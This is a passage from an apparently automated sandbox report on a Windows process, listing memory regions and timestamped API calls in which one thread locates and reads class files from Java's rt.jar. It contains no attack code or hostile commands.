filename = "" Region: id = 525 start_va = 0x20e0000 end_va = 0x20e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 526 start_va = 0x13b80000 end_va = 0x13b92fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 527 start_va = 0x13ba0000 end_va = 0x13ba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013ba0000" filename = "" Region: id = 529 start_va = 0x146d0000 end_va = 0x147cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000146d0000" filename = "" Region: id = 553 start_va = 0x147d0000 end_va = 0x148cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000147d0000" filename = "" Region: id = 554 start_va = 0x148d0000 end_va = 0x149acfff monitored = 0 entry_point = 0x1492e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 555 start_va = 0x148d0000 end_va = 0x149cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000148d0000" filename = "" Region: id = 556 start_va = 0x20e0000 end_va = 0x20e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 557 start_va = 0x13bb0000 end_va = 0x13bb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013bb0000" filename = "" Region: id = 559 start_va = 0x7ffb539c0000 end_va = 0x7ffb53b77fff monitored = 0 entry_point = 0x7ffb53a2e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 561 start_va = 0x7ffb58ad0000 end_va = 0x7ffb58e51fff monitored = 0 entry_point = 0x7ffb58b21220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 562 start_va = 0x7ffb5def0000 end_va = 0x7ffb5df1cfff monitored = 0 entry_point = 0x7ffb5df09d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 563 start_va = 0x13bc0000 end_va = 0x13bc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013bc0000" filename = "" Region: id = 580 start_va = 0x149d0000 end_va = 0x14acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000149d0000" filename = "" Region: id = 581 start_va = 0x14ad0000 end_va = 0x14bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014ad0000" filename = "" Thread: id = 1 os_tid = 0x124c [0151.401] _encoded_null () returned 0x45b714d28000000 [0151.401] _encoded_null () returned 0x45b714d28000000 [0151.401] _encoded_null () returned 0x45b714d28000000 [0151.401] _encoded_null () returned 0x45b714d28000000 [0151.402] _encoded_null () returned 0x45b714d28000000 [0151.402] _encoded_null () returned 0x45b714d28000000 [0151.402] CloseHandle (hObject=0x318) returned 1 [0151.402] CloseHandle (hObject=0x320) returned 1 [0151.402] _encoded_null () returned 0x45b714d28000000 [0151.402] _encoded_null () returned 0x45b714d28000000 [0151.402] ??3@YAXPEAX@Z () returned 0x1 [0151.403] free (_Block=0x130562f0) [0151.403] _encoded_null () returned 0x45b714d28000000 [0151.403] _encoded_null () returned 0x45b714d28000000 [0151.403] free (_Block=0x13056a70) [0151.403] _encoded_null () returned 0x45b714d28000000 [0151.403] _encoded_null () returned 0x45b714d28000000 [0151.403] ??3@YAXPEAX@Z () returned 0x1 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.404] ??3@YAXPEAX@Z () returned 0x1 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.404] _encoded_null () returned 0x45b714d28000000 [0151.405] _encoded_null () returned 0x45b714d28000000 [0151.405] _encoded_null () returned 0x45b714d28000000 [0151.405] _encoded_null () returned 0x45b714d28000000 [0151.405] _encoded_null () returned 0x45b714d28000000 [0151.405] ??3@YAXPEAX@Z () returned 0x1 [0151.406] free (_Block=0x130558a0) [0151.406] _encoded_null () returned 0x45b714d28000000 [0151.406] _encoded_null () returned 0x45b714d28000000 [0151.406] _encoded_null () returned 0x45b714d28000000 [0151.406] _encoded_null () returned 0x45b714d28000000 [0151.406] _encoded_null () returned 0x45b714d28000000 [0151.406] _encoded_null () returned 0x45b714d28000000 [0151.407] _encoded_null () returned 0x45b714d28000000 [0151.407] _encoded_null () returned 0x45b714d28000000 [0151.407] _encoded_null () returned 0x45b714d28000000 [0151.407] _encoded_null () returned 0x45b714d28000000 [0151.407] __clean_type_info_names_internal () returned 0x0 [0151.407] _encoded_null () returned 0x45b714d28000000 [0151.407] _encoded_null () returned 0x45b714d28000000 [0151.407] free (_Block=0x12f097d0) [0151.407] _encoded_null () returned 0x45b714d28000000 [0151.408] _encoded_null () returned 0x45b714d28000000 [0151.408] _encoded_null () returned 0x45b714d28000000 [0151.408] __clean_type_info_names_internal () returned 0x0 [0151.408] _encoded_null () returned 0x45b714d28000000 [0151.408] _encoded_null () returned 0x45b714d28000000 [0151.408] free (_Block=0x1225a000) [0151.408] _encoded_null () returned 0x45b714d28000000 [0151.409] WSACleanup () returned 0 [0151.409] _encoded_null () returned 0x45b714d28000000 [0151.409] _encoded_null () returned 0x45b714d28000000 [0151.409] __clean_type_info_names_internal () returned 0x0 [0151.409] _encoded_null () returned 0x45b714d28000000 [0151.409] _encoded_null () returned 0x45b714d28000000 [0151.410] free (_Block=0x12259cd0) [0151.410] _encoded_null () returned 0x45b714d28000000 [0151.417] _encoded_null () returned 0x45b714d28000000 [0151.417] _encoded_null () returned 0x45b714d28000000 [0151.417] __clean_type_info_names_internal () returned 0x0 [0151.417] _encoded_null () returned 0x45b714d28000000 [0151.417] _encoded_null () returned 0x45b714d28000000 [0151.417] free (_Block=0x210c3c0) [0151.417] _encoded_null () returned 0x45b714d28000000 [0151.418] _encoded_null () returned 0x45b714d28000000 [0151.418] _encoded_null () returned 0x45b714d28000000 [0151.418] __clean_type_info_names_internal () returned 0x0 [0151.418] _encoded_null () returned 0x45b714d28000000 [0151.418] _encoded_null () returned 0x45b714d28000000 [0151.418] free (_Block=0x20f7ea0) [0151.418] _encoded_null () returned 0x45b714d28000000 [0151.418] _encoded_null () returned 0x45b714d28000000 [0151.419] _encoded_null () returned 0x45b714d28000000 [0151.419] __clean_type_info_names_internal () returned 0x0 [0151.419] _encoded_null () returned 0x45b714d28000000 [0151.419] _encoded_null () returned 0x45b714d28000000 [0151.419] free (_Block=0x20f7d90) [0151.419] _encoded_null () returned 0x45b714d28000000 Thread: id = 6 os_tid = 0x12cc Thread: id = 7 os_tid = 0x12e4 [0088.072] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x208f010 | out: lpSystemTimeAsFileTime=0x208f010*(dwLowDateTime=0x1683bc8a, dwHighDateTime=0x1d80c8a)) [0088.072] GetCurrentProcessId () returned 0x1250 [0088.072] GetCurrentThreadId () returned 0x12e4 [0088.073] GetTickCount () returned 0x1514a02 [0088.073] QueryPerformanceCounter (in: lpPerformanceCount=0x208f018 | out: lpPerformanceCount=0x208f018*=2220317535798) returned 1 [0088.073] _malloc_crt () returned 0x20f7d90 [0088.073] __dllonexit () returned 0x721eacee8000000 [0088.074] __dllonexit () returned 0x721ea3648000000 [0088.074] DisableThreadLibraryCalls (hLibModule=0x6f530000) returned 1 [0088.589] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x208f010 | out: lpSystemTimeAsFileTime=0x208f010*(dwLowDateTime=0x16d28f87, dwHighDateTime=0x1d80c8a)) [0088.589] GetCurrentProcessId () returned 0x1250 [0088.589] GetCurrentThreadId () returned 0x12e4 [0088.589] GetTickCount () returned 0x1514c05 [0088.589] QueryPerformanceCounter (in: lpPerformanceCount=0x208f018 | out: lpPerformanceCount=0x208f018*=2220369164013) returned 1 [0088.589] _malloc_crt () returned 0x20f7ea0 [0088.590] __dllonexit () returned 0x721fd8ce8000000 [0088.592] __dllonexit () returned 0x721fdf448000000 [0088.593] DisableThreadLibraryCalls (hLibModule=0x6f500000) returned 1 [0088.595] atoi (_Str="1") returned 1 [0088.595] atoi (_Str="8") returned 8 [0088.595] atoi (_Str="0") returned 0 [0088.595] strlen (_Str="b11") returned 0x3 [0088.595] atoi (_Str="11") returned 11 [0088.595] strlen (_Str="171") returned 0x3 [0088.595] strncpy (in: _Dest=0x208fbd8, _Source="171", _Count=0x3 | out: _Dest="171^û\x7f") returned="171^û\x7f" [0088.596] atoi (_Str="171") returned 171 [0088.822] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x208f000 | out: lpSystemTimeAsFileTime=0x208f000*(dwLowDateTime=0x16f61dc6, dwHighDateTime=0x1d80c8a)) [0088.822] GetCurrentProcessId () returned 0x1250 [0088.822] GetCurrentThreadId () returned 0x12e4 [0088.822] GetTickCount () returned 0x1514cf0 [0088.822] QueryPerformanceCounter (in: lpPerformanceCount=0x208f008 | out: lpPerformanceCount=0x208f008*=2220392500161) returned 1 [0088.823] _malloc_crt () returned 0x210c3c0 [0088.823] __dllonexit () returned 0x72104f4e8000000 [0088.823] __dllonexit () returned 0x72104fc48000000 [0088.824] DisableThreadLibraryCalls (hLibModule=0x6f4e0000) returned 1 [0089.513] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0089.514] FindFirstFileA (in: lpFileName="C:\\Program Files", lpFindFileData=0x208ec70 | out: lpFindFileData=0x208ec70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x426680 [0089.515] FindClose (in: hFindFile=0x426680 | out: hFindFile=0x426680) returned 1 [0089.515] strlen (_Str="Program Files") returned 0xd [0089.515] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208ec70 | out: lpFindFileData=0x208ec70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="Java", cAlternateFileName="")) returned 0x426560 [0089.515] FindClose (in: hFindFile=0x426560 | out: hFindFile=0x426560) returned 1 [0089.516] strlen (_Str="Java") returned 0x4 [0089.516] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208ec70 | out: lpFindFileData=0x208ec70*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x425a20 [0089.516] FindClose (in: hFindFile=0x425a20 | out: hFindFile=0x425a20) returned 1 [0089.516] strlen (_Str="jre1.8.0_171") returned 0xc [0089.517] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", lpFindFileData=0x208ec70 | out: lpFindFileData=0x208ec70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="lib", cAlternateFileName="")) returned 0x425b40 [0089.517] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0089.517] strlen (_Str="lib") returned 0x3 [0089.517] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", lpFindFileData=0x208ec70 | out: lpFindFileData=0x208ec70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8beacf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb8beacf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed0077b9, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x341fe37, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="rt.jar", cAlternateFileName="")) returned 0x426380 [0089.517] FindClose (in: hFindFile=0x426380 | out: hFindFile=0x426380) returned 1 [0089.518] strlen (_Str="rt.jar") returned 0x6 [0089.519] _errno () returned 0x20f6be0 [0089.521] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0089.521] strcpy (in: _Dest=0x208edb0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" [0089.522] CreateFileA (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\rt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0089.523] calloc (_Count=0x1, _Size=0xa8) returned 0x121a6e40 [0089.524] ReadFile (in: hFile=0x134, lpBuffer=0x208f090, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208f040, lpOverlapped=0x0 | out: lpBuffer=0x208f090*, lpNumberOfBytesRead=0x208f040*=0x4, lpOverlapped=0x0) returned 1 [0089.528] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x208f070, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208f070*=54656567) returned 1 [0089.528] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fdb7, lpNewFilePointer=0x208ee40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee40*=54656439) returned 1 [0089.528] ReadFile (in: hFile=0x134, lpBuffer=0x208eea0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208ee10, lpOverlapped=0x0 | out: lpBuffer=0x208eea0*, lpNumberOfBytesRead=0x208ee10*=0x80, lpOverlapped=0x0) returned 1 [0089.531] malloc (_Size=0x8) returned 0x121a55f0 [0089.531] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fe30, lpNewFilePointer=0x208ee40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee40*=54656560) returned 1 [0089.531] ReadFile (in: hFile=0x134, lpBuffer=0x121a55f0, nNumberOfBytesToRead=0x7, lpNumberOfBytesRead=0x208ee10, lpOverlapped=0x0 | out: lpBuffer=0x121a55f0*, lpNumberOfBytesRead=0x208ee10*=0x7, lpOverlapped=0x0) returned 1 [0089.531] free (_Block=0x0) [0089.531] free (_Block=0x0) [0089.531] malloc (_Size=0x1d08a0) returned 0x12332040 [0089.541] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324f57a, lpNewFilePointer=0x208ef40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ef40*=52753786) returned 1 [0089.541] ReadFile (in: hFile=0x134, lpBuffer=0x12332040, nNumberOfBytesToRead=0x1d08a0, lpNumberOfBytesRead=0x208ef10, lpOverlapped=0x0 | out: lpBuffer=0x12332040*, lpNumberOfBytesRead=0x208ef10*=0x1d08a0, lpOverlapped=0x0) returned 1 [0089.640] calloc (_Count=0x4d5b, _Size=0x10) returned 0x21ace60 [0089.646] malloc (_Size=0x9ab4) returned 0x121a6ef0 [0089.647] calloc (_Count=0x2, _Size=0x8) returned 0x2115050 [0089.647] malloc (_Size=0xa) returned 0x21153d0 [0089.647] malloc (_Size=0x15) returned 0x21153b0 [0089.663] free (_Block=0x12332040) [0089.677] strlen (_Str="java/lang/Object.class") returned 0x16 [0089.678] malloc (_Size=0x48) returned 0x2111cd0 [0089.678] malloc (_Size=0x61) returned 0x121b09b0 [0089.678] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fdd6, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54656470) returned 1 [0089.678] ReadFile (in: hFile=0x134, lpBuffer=0x121b09b0, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121b09b0*, lpNumberOfBytesRead=0x208f1d0*=0x61, lpOverlapped=0x0) returned 1 [0089.678] malloc (_Size=0x17) returned 0x2115570 [0089.679] free (_Block=0x121b09b0) [0089.679] strlen (_Str="java/lang/Object.class") returned 0x16 [0089.679] strcpy (in: _Dest=0x208f380, _Source="java/lang/Object.class" | out: _Dest="java/lang/Object.class") returned="java/lang/Object.class" [0089.679] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324f01a, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52752410) returned 1 [0089.679] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.680] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324f04e, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52752462) returned 1 [0089.681] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x52c, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x52c, lpOverlapped=0x0) returned 1 [0089.701] strlen (_Str="java/lang/String.class") returned 0x16 [0089.702] malloc (_Size=0x48) returned 0x2111af0 [0089.702] malloc (_Size=0xa0) returned 0x121b0ac0 [0089.702] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fd92, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54656402) returned 1 [0089.702] ReadFile (in: hFile=0x134, lpBuffer=0x121b0ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121b0ac0*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.702] malloc (_Size=0x17) returned 0x21152d0 [0089.702] free (_Block=0x121b0ac0) [0089.702] strlen (_Str="java/lang/String.class") returned 0x16 [0089.703] strcpy (in: _Dest=0x208f380, _Source="java/lang/String.class" | out: _Dest="java/lang/String.class") returned="java/lang/String.class" [0089.703] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324b23f, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52736575) returned 1 [0089.703] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.704] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324b273, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52736627) returned 1 [0089.704] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x3da7, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ee30*=0x3da7, lpOverlapped=0x0) returned 1 [0089.705] free (_Block=0x2115570) [0089.705] free (_Block=0x2111cd0) [0089.714] strlen (_Str="java/io/Serializable.class") returned 0x1a [0089.714] malloc (_Size=0x48) returned 0x2112680 [0089.714] malloc (_Size=0xa0) returned 0x121b0ac0 [0089.715] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fd4a, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54656330) returned 1 [0089.715] ReadFile (in: hFile=0x134, lpBuffer=0x121b0ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x121b0ac0*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0089.715] malloc (_Size=0x1b) returned 0x2114290 [0089.715] free (_Block=0x121b0ac0) [0089.719] strlen (_Str="java/io/Serializable.class") returned 0x1a [0089.719] strcpy (in: _Dest=0x208e8c0, _Source="java/io/Serializable.class" | out: _Dest="java/io/Serializable.class") returned="java/io/Serializable.class" [0089.719] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324b1bf, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52736447) returned 1 [0089.719] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0089.719] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324b1f7, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52736503) returned 1 [0089.719] ReadFile (in: hFile=0x134, lpBuffer=0x2106970, nNumberOfBytesToRead=0x48, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x2106970*, lpNumberOfBytesRead=0x208e370*=0x48, lpOverlapped=0x0) returned 1 [0089.720] free (_Block=0x21152d0) [0089.720] free (_Block=0x2111af0) [0089.723] strlen (_Str="java/lang/Comparable.class") returned 0x1a [0089.724] malloc (_Size=0x48) returned 0x2111870 [0089.724] malloc (_Size=0xa0) returned 0x121b0ac0 [0089.724] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fd02, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54656258) returned 1 [0089.724] ReadFile (in: hFile=0x134, lpBuffer=0x121b0ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x121b0ac0*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0089.724] malloc (_Size=0x1b) returned 0x21143e0 [0089.724] free (_Block=0x121b0ac0) [0089.724] strlen (_Str="java/lang/Comparable.class") returned 0x1a [0089.724] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/Comparable.class" | out: _Dest="java/lang/Comparable.class") returned="java/lang/Comparable.class" [0089.725] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324b0c3, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52736195) returned 1 [0089.725] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0089.725] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324b0fb, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52736251) returned 1 [0089.725] ReadFile (in: hFile=0x134, lpBuffer=0x2106970, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x2106970*, lpNumberOfBytesRead=0x208e370*=0xc4, lpOverlapped=0x0) returned 1 [0089.725] free (_Block=0x2114290) [0089.725] free (_Block=0x2112680) [0089.748] strlen (_Str="java/lang/CharSequence.class") returned 0x1c [0089.748] malloc (_Size=0x48) returned 0x2111af0 [0089.748] malloc (_Size=0xa0) returned 0x121b0ac0 [0089.748] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fcb8, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54656184) returned 1 [0089.748] ReadFile (in: hFile=0x134, lpBuffer=0x121b0ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x121b0ac0*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0089.749] malloc (_Size=0x1d) returned 0x2114470 [0089.749] free (_Block=0x121b0ac0) [0089.749] strlen (_Str="java/lang/CharSequence.class") returned 0x1c [0089.749] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/CharSequence.class" | out: _Dest="java/lang/CharSequence.class") returned="java/lang/CharSequence.class" [0089.750] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324a97e, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52734334) returned 1 [0089.750] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0089.751] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x324a9b8, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52734392) returned 1 [0089.751] ReadFile (in: hFile=0x134, lpBuffer=0x2106970, nNumberOfBytesToRead=0x70b, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x2106970*, lpNumberOfBytesRead=0x208e370*=0x70b, lpOverlapped=0x0) returned 1 [0089.751] free (_Block=0x21143e0) [0089.751] free (_Block=0x2111870) [0089.781] malloc (_Size=0x48) returned 0x2112680 [0089.781] malloc (_Size=0xa0) returned 0x121b0ac0 [0089.781] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341fc75, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54656117) returned 1 [0089.781] ReadFile (in: hFile=0x134, lpBuffer=0x121b0ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121b0ac0*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0089.781] malloc (_Size=0x16) returned 0x2114f10 [0089.781] free (_Block=0x121b0ac0) [0089.782] strlen (_Str="java/lang/Class.class") returned 0x15 [0089.782] strcpy (in: _Dest=0x208f380, _Source="java/lang/Class.class" | out: _Dest="java/lang/Class.class") returned="java/lang/Class.class" [0089.782] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3243221, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52703777) returned 1 [0089.782] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0089.783] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3243254, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52703828) returned 1 [0089.783] 